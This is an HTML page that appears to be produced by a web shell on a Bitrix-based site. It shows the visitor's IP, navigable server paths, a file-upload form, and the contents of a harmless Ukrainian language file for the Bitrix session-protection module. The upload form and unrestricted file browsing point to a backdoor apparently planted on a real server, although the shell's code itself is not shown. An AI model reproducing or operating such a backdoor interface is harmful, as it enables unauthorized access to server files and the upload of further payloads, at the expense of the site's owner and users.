<!DOCTYPE HTML>
<HTML>
<HEAD>
<title></title>
<style>
body{
font-family: monospace;
font-weight: bold;
font-size: 18px;
background-color: #c5c5c5;
color: #000;
}
#content tr:hover{
background-color: #ccc;
}
#content .first{
background-color: #ccc;
}
#content .first:hover{
background-color: #ccc;
}
table{
border: 3px #000 solid;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #00f;
}
input,select,textarea{
border: 1px #000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
input {
 font-size: 18px;
 font-weight: bold;
 padding: 5px;
}
select {
font-size: 19px
}
textarea {
font-size: 10px
}
td, tr { padding: 2px 5px; }

</style>
</HEAD>
<BODY>
<hr width="920" color="black"/>
<hr width="920" color="black"/><center><p><h2>Your IP : 216.73.216.86</h2></p></center>
<hr width="920" color="black"/>
<table width="920" border="1px" cellpadding="7" cellspacing="0" align="center">
<tr><td style="padding: 8px">Current Path : <a href="?path=/">/</a><a href="?path=/var">var</a>/<a href="?path=/var/www">www</a>/<a href="?path=/var/www/homesaver">homesaver</a>/<a href="?path=/var/www/homesaver/www">www</a>/<a href="?path=/var/www/homesaver/www/bitrix">bitrix</a>/<a href="?path=/var/www/homesaver/www/bitrix/modules">modules</a>/<a href="?path=/var/www/homesaver/www/bitrix/modules/security">security</a>/<a href="?path=/var/www/homesaver/www/bitrix/modules/security/lang">lang</a>/<a href="?path=/var/www/homesaver/www/bitrix/modules/security/lang/ua">ua</a>/<a href="?path=/var/www/homesaver/www/bitrix/modules/security/lang/ua/admin">admin</a>/</td></tr><tr><td><form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="submit" value="Upload" />
</form>
</td></tr><tr><td style='padding: 8px'>Current File : /var/www/homesaver/www/bitrix/modules/security/lang/ua/admin/security_session.php</tr></td></table><br /><pre>&lt;?php
$MESS[&quot;SEC_SESSION_ADMIN_DB_BUTTON_OFF&quot;] = &quot;Вимкнути зберігання даних сесій у БД модуля&quot;;
$MESS[&quot;SEC_SESSION_ADMIN_DB_BUTTON_ON&quot;] = &quot;Увімкнути зберігання даних сесій у БД модуля&quot;;
$MESS[&quot;SEC_SESSION_ADMIN_DB_NOTE&quot;] = &quot;&lt;p&gt;Більшість атак на веб-застосунки ставлять метою отримати дані про авторизовану сесію користувача. Увімкнення &lt;b&gt;захисту сесій&lt;/b&gt; робить викрадення авторизованої сесії неефективним.&lt;/p&gt;
&lt;p&gt; На додаток до стандартних інструментів захисту сесій, які встановлюються у налаштуваннях групи, &lt;b&gt;механізм захисту сесій&lt;/b&gt; містить:
&lt;ul style=\&quot;font-size:100%\&quot;&gt;
&lt;li&gt;зміну ідентифікатора сессії раз на декілька хвилин (в залежності від налаштування);&lt;/li&gt;
&lt;li&gt; зберігання даних сесій у таблиці модуля.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Зберігання даних сесії у таблиці модуля дозволяє уникнути перегляду цих даних через скрипти інших віртуальних серверів, виключивши помилки конфігурування віртуального хостингу, помилки налаштування прав доступу в тимчасових каталогах і низку інших проблем налаштування операційного середовища. Крім того, це розвантажує файлову систему шляхом переносу навантаження на сервер бази даних.&lt;/p&gt;
&lt;p&gt;&lt;i&gt; Рекомендується увімкнути для високого рівня.&lt;/i&gt;&lt;/p&gt;
&quot;;
$MESS[&quot;SEC_SESSION_ADMIN_DB_NOTE_V2&quot;] = &quot;
 &lt;p&gt;Зберігання даних сесій у БД, Redis або Memcache в порівнянні зі зберіганням у файлах дозволяє уникнути читання цих даних через скрипти інших віртуальних серверів, виключивши помилки конфігурації віртуального хостингу, помилки налаштування прав доступу в тимчасових каталогах і ряд інших проблем налаштувань операційного середовища. Крім того, це розвантажує файлову систему, переносячи навантаження на сервер бази даних або Redis, Memcache.&lt;/p&gt;

&lt;p&gt;Для зміни налаштувань зберігання необхідно змінити файл &lt;b&gt;.settings.php&lt;/b&gt; відповідно до&lt;a href=&#039;https://dev.1c-bitrix.ru/learning/course/index.php?COURSE_ID=43&amp;CHAPTER_ID=02795&amp;LESSON_PATH=3913.3516.5062.2795#session&#039;&gt;документації&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Також на додаток до стандартних інструментів захисту сесій, які встановлюються в налаштуваннях групи, можна встановити зміну ідентифікатора сесії раз на кілька хвилин (у залежності від налаштувань).&lt;/p&gt;

&lt;p&gt;&lt;i&gt;Рекомендується включити для високого рівня.&lt;/i&gt;&lt;/p&gt;&quot;;
$MESS[&quot;SEC_SESSION_ADMIN_DB_OFF&quot;] = &quot;Дані сесій не зберігаються у БД модуля безпеки.&quot;;
$MESS[&quot;SEC_SESSION_ADMIN_DB_ON&quot;] = &quot;Дані сесій зберігаються у БД модуля безпеки.&quot;;
$MESS[&quot;SEC_SESSION_ADMIN_DB_WARNING&quot;] = &quot;Увага! При перемиканні режиму зберігання сесій всі користувачі втратять авторизацію (дані сесій будуть знищені).&quot;;
$MESS[&quot;SEC_SESSION_ADMIN_SAVEDB_TAB&quot;] = &quot;Зберігання в базі даних&quot;;
$MESS[&quot;SEC_SESSION_ADMIN_SAVEDB_TAB_TITLE_V2&quot;] = &quot;Налаштування зберігання даних сесій користувачів&quot;;
$MESS[&quot;SEC_SESSION_ADMIN_SAVEDB_TAB_V2&quot;] = &quot;Налаштування зберігання&quot;;
$MESS[&quot;SEC_SESSION_ADMIN_SESSID_BUTTON_OFF&quot;] = &quot;Вимкнути зміну ідентифікатора&quot;;
$MESS[&quot;SEC_SESSION_ADMIN_SESSID_BUTTON_ON&quot;] = &quot;Увімкнути зміну ідентифікатора&quot;;
$MESS[&quot;SEC_SESSION_ADMIN_SESSID_NOTE&quot;] = &quot;&lt;p&gt;При включенні зміни ідентифікатор сесії користувача почне змінюватися через заданий проміжок часу. Це створює додаткове навантаження на сервер, але дозволяє зробити викрадення авторизованої сесії неефективним.&lt;/p&gt;
&lt;p&gt;&lt;i&gt; Рекомендується увімкнути для високого рівня.&lt;/i&gt;&lt;/p&gt;
&quot;;
$MESS[&quot;SEC_SESSION_ADMIN_SESSID_OFF&quot;] = &quot;Зміна ідентифікатора сесій вимкнена.&quot;;
$MESS[&quot;SEC_SESSION_ADMIN_SESSID_ON&quot;] = &quot;Зміна ідентифікатора сесій увімкнена.&quot;;
$MESS[&quot;SEC_SESSION_ADMIN_SESSID_TAB&quot;] = &quot;Зміна ідентифікатора&quot;;
$MESS[&quot;SEC_SESSION_ADMIN_SESSID_TAB_TITLE&quot;] = &quot;Налаштування параметрів зміни ідентифікатора сесій&quot;;
$MESS[&quot;SEC_SESSION_ADMIN_SESSID_TTL&quot;] = &quot;Час життя ідентифікатора, в секундах&quot;;
$MESS[&quot;SEC_SESSION_ADMIN_SESSID_WARNING&quot;] = &quot;Ідентифікатор сесії не сумісний з модулем безпеки. Ідентифікатор повертається функцією session_id() повинен бути не більше 32-х символів довжиною і містити тільки символи латинського алфавіту і цифри.&quot;;
$MESS[&quot;SEC_SESSION_ADMIN_STORAGE_IN_FILES&quot;] = &quot;Дані сесій зберігаються у файлах.&quot;;
$MESS[&quot;SEC_SESSION_ADMIN_STORAGE_NAME_TYPE_DATABASE&quot;] = &quot;БД&quot;;
$MESS[&quot;SEC_SESSION_ADMIN_STORAGE_NAME_TYPE_FILE&quot;] = &quot;Файлах&quot;;
$MESS[&quot;SEC_SESSION_ADMIN_STORAGE_NAME_TYPE_MEMCACHE&quot;] = &quot;Memcache&quot;;
$MESS[&quot;SEC_SESSION_ADMIN_STORAGE_NAME_TYPE_REDIS&quot;] = &quot;Redis&quot;;
$MESS[&quot;SEC_SESSION_ADMIN_STORAGE_WITH_SESSION_DATA&quot;] = &quot;Дані сесій зберігаються в #NAME#.&quot;;
$MESS[&quot;SEC_SESSION_ADMIN_TITLE&quot;] = &quot;Захист сесій&quot;;
</pre><center><hr width="920" color="black"/> <center>
</BODY>
</HTML>